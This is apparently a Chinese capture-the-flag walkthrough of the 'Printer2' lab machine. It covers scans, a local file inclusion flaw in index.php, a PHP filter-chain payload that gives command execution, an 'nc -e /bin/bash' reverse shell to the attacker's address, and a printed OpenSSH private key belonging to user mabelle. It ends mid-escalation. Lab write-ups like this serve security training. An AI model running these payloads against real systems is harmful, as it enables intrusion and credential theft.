Printer2
信息扫描
端口扫描
┌──(kali💀kali)-[~/temp/printer2]
└─$ rustscan -a 192.168.0.181 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.0.181:22
Open 192.168.0.181:80
Open 192.168.0.181:631
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV/Sx5gw/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+/5R0D/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9/d6o2oWdMM=
| 256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=
| 256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS
80/tcp open http syn-ack Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Free Website Templates
631/tcp open ipp syn-ack CUPS 2.3
|_http-server-header: CUPS/2.3 IPP/2.1
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - CUPS 2.3.3op2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel目录扫描
┌──(kali💀kali)-[~/temp/printer2]
└─$ gobuster dir -u http://192.168.0.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.0.181/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,jpg,txt,html,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/images (Status: 301) [Size: 315] [--> http://192.168.0.181/images/]
/.html (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/.php (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================漏洞发现
踩点
随手搜一下漏洞,但是没找到,看一下包:
存在dns解析:
192.168.0.181 printer4life.printer.hmv尝试探测一下子目录:
┌──(kali💀kali)-[~/temp/printer2]
└─$ gobuster dir -u http://printer4life.printer.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://printer4life.printer.hmv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,jpg,txt,html,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 289]
/.html (Status: 403) [Size: 289]
/index.php (Status: 200) [Size: 365]
/logo (Status: 200) [Size: 77750]
/logo.jpg (Status: 200) [Size: 77750]
/hp.php (Status: 200) [Size: 27]
/hp.jpg (Status: 200) [Size: 33673]
/hp (Status: 200) [Size: 33673]
/canon (Status: 200) [Size: 101939]
/canon.jpg (Status: 200) [Size: 101939]
/canon.php (Status: 200) [Size: 30]
/epson.jpg (Status: 200) [Size: 64020]
/epson (Status: 200) [Size: 64020]
/epson.php (Status: 200) [Size: 30]
/.php (Status: 403) [Size: 289]
/.html (Status: 403) [Size: 289]
/server-status (Status: 403) [Size: 289]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================LFI
再看看有啥:
┌──(root㉿kali)-[/home/kali/temp/printer2]
└─# curl http://printer4life.printer.hmv/<!DOCTYPE html>
<html>
<head>
<title>Printers</title>
</head>
<body>
<h1>Select a printer</h1>
<p>I love printers so much ! I print every minute</p>
<ul>
<li><a href="index.php?page=hp">HP</a></li>
<li><a href="index.php?page=canon">Canon</a></li>
<li><a href="index.php?page=epson">Epson</a></li>
</ul>
</body>
</html>发现疑似存在LFI漏洞:
┌──(root㉿kali)-[/home/kali/temp/printer2]
└─# curl http://printer4life.printer.hmv/index.php?page=../../../../../etc/passwd
<!DOCTYPE html>
<html>
<head>
<title>Printers</title>
</head>
<body>
<h1>Select a printer</h1>
<p>I love printers so much ! I print every minute</p>
<ul>
<li><a href="index.php?page=hp">HP</a></li>
<li><a href="index.php?page=canon">Canon</a></li>
<li><a href="index.php?page=epson">Epson</a></li>
</ul>
</body>
</html>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mabelle:x:1000:1000:,,,:/home/mabelle:/bin/bash
avahi:x:107:115:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:117::/var/lib/saned:/usr/sbin/nologin
colord:x:109:118:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
salt:x:110:119::/var/lib/salt:/bin/sh
_rpc:x:111:65534::/run/rpcbind:/usr/sbin/nologin
kierra:x:1001:1002:,,,:/home/kierra:/bin/bash不错!!!!!
┌──(root㉿kali)-[/home/kali/temp/printer2]
└─# curl http://printer4life.printer.hmv/index.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
<!DOCTYPE html>
<html>
<head>
<title>Printers</title>
</head>
<body>
<h1>Select a printer</h1>
<p>I love printers so much ! I print every minute</p>
<ul>
<li><a href="index.php?page=hp">HP</a></li>
<li><a href="index.php?page=canon">Canon</a></li>
<li><a href="index.php?page=epson">Epson</a></li>
</ul>
</body>
</html>
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXRpbWVzeW5jOng6MTA0OjExMDpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTA1OjExMzpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4Kc3NoZDp4OjEwNjo2NTUzNDo6L3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgptYWJlbGxlOng6MTAwMDoxMDAwOiwsLDovaG9tZS9tYWJlbGxlOi9iaW4vYmFzaAphdmFoaTp4OjEwNzoxMTU6QXZhaGkgbUROUyBkYWVtb24sLCw6L3J1bi9hdmFoaS1kYWVtb246L3Vzci9zYmluL25vbG9naW4Kc2FuZWQ6eDoxMDg6MTE3OjovdmFyL2xpYi9zYW5lZDovdXNyL3NiaW4vbm9sb2dpbgpjb2xvcmQ6eDoxMDk6MTE4OmNvbG9yZCBjb2xvdXIgbWFuYWdlbWVudCBkYWVtb24sLCw6L3Zhci9saWIvY29sb3JkOi91c3Ivc2Jpbi9ub2xvZ2luCnNhbHQ6eDoxMTA6MTE5OjovdmFyL2xpYi9zYWx0Oi9iaW4vc2gKX3JwYzp4OjExMTo2NTUzNDo6L3J1bi9ycGNiaW5kOi91c3Ivc2Jpbi9ub2xvZ2luCmtpZXJyYTp4OjEwMDE6MTAwMjosLCw6L2hvbWUva2llcnJhOi9iaW4vYmFzaAo=发现可以使用伪协议进行读写,尝试构造php链进行命令执行!
python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]` ?> (base64 value: PD89YCRfR0VUWzBdYCA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp尝试反弹shell!!!!
http://printer4life.printer.hmv/index.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=whoami
成功执行命令,反弹一下shell!!!!
http://printer4life.printer.hmv/index.php?page=payload&0=nc+-e+/bin/bash+192.168.0.143+1234
提权
信息搜集
(remote) www-data@printer.hmv:/var/www/printer4life$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for www-data:
sudo: a password is required
(remote) www-data@printer.hmv:/var/www/printer4life$ cat /etc/passwd | grep "bash"
root:x:0:0:root:/root:/bin/bash
mabelle:x:1000:1000:,,,:/home/mabelle:/bin/bash
kierra:x:1001:1002:,,,:/home/kierra:/bin/bash
(remote) www-data@printer.hmv:/var/www/printer4life$ cd /home
(remote) www-data@printer.hmv:/home$ ls
kierra mabelle
(remote) www-data@printer.hmv:/home$ cd kierra/
(remote) www-data@printer.hmv:/home/kierra$ ls -la
total 24
drwxr-xr-x 2 kierra kierra 4096 Apr 22 2023 .
drwxr-xr-x 4 root root 4096 Apr 22 2023 ..
lrwxrwxrwx 1 root root 9 Apr 22 2023 .bash_history -> /dev/null
-rw-r--r-- 1 kierra kierra 220 Apr 22 2023 .bash_logout
-rw-r--r-- 1 kierra kierra 3526 Apr 22 2023 .bashrc
-rw-r--r-- 1 kierra kierra 807 Apr 22 2023 .profile
-rwx------ 1 kierra kierra 33 Apr 22 2023 user.txt
(remote) www-data@printer.hmv:/home/kierra$ cat user.txt
cat: user.txt: Permission denied
(remote) www-data@printer.hmv:/home/kierra$ cd ../mabelle/
(remote) www-data@printer.hmv:/home/mabelle$ ls -la
total 32
drwxr-xr-x 4 mabelle mabelle 4096 May 20 2023 .
drwxr-xr-x 4 root root 4096 Apr 22 2023 ..
lrwxrwxrwx 1 root root 9 Apr 14 2023 .bash_history -> /dev/null
-rw-r--r-- 1 mabelle mabelle 220 Apr 14 2023 .bash_logout
-rw-r--r-- 1 mabelle mabelle 3526 Apr 14 2023 .bashrc
drwxr-xr-x 3 mabelle mabelle 4096 May 20 2023 .local
-rw-r--r-- 1 mabelle mabelle 807 Apr 14 2023 .profile
drwx------ 2 mabelle mabelle 4096 Apr 22 2023 .ssh
-rw-r--r-- 1 mabelle mabelle 2602 Apr 22 2023 mabelle_private_ssh_key
(remote) www-data@printer.hmv:/home/mabelle$ cat mabelle_private_ssh_key
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----尝试切换一下用户!
进一步提权
3 sudo -l
4 ls -la
5 find / -perm -u=s -type f 2>/dev/null
6 /usr/sbin/getcap -r / 2>/dev/null
7 ss -atlp
8 nc 127.0.0.1 1001因为运行程序会覆盖终端,尝试一下:
